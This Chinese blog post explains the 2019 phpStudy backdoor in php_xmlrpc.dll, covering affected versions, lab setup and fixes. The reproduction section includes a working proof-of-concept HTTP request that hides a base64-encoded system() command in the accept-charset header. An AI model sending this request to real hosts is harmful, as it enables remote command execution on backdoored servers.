phpStudy后门漏洞利用及修复

2022/5/7 15:27:15 作者:站长日记 来源:https://blog.csdn.net/weixin_42140534/article/details/105103372 浏览:149次

0x01 漏洞简介

事件背景

  北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组,非法牟利600多万元。

  • 漏洞:程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门

  • php.ini中必须要引用该模块,这样才能去复现该漏洞,若开启了xmlrpc功能,php就会加载这个php_xmlrpc.dll动态链接库文件,其中的恶意代码就会被触发

    • 方法1:通过php.ini配置文件查看,位置D:\phpStudy\PHPTutorial\php\php-5.4.45\ext

    • 查看是否引用该模块:

    • 方法2:通过phpinfo查看

  • 影响版本:phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)

0x02 影响版本

phpstudy 2016版php-5.4

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

0x03 后门位置

后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带php-5.2.17、php-5.4.45

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

0x04 环境搭建

使用带后门的phpstudy进行搭建在www目录写一个index.pnp

<?php 
echo “helloworld!”;
?>

0x05 漏洞复现

访问这个页面进行抓包将修改一下内容

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7      //字段需要进行base64编码
Accept-Encoding: gzip,deflate         //deflate前面的空格去掉

20200325202404578.png

POC

GET / HTTP/1.1
Host: 192.168.4.113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
Content-Length: 2

0x06 漏洞修复

1.在官网中下载最新的PhpStudy

2.将PhpStudy中php5.4和php5.2里面的php_xmlrpc.dll替换为官方的文件

3.使用phpstudy安全自检修复程序2.0


上一篇: 基于PHPExcel的常用方法总结 下一篇: 没有了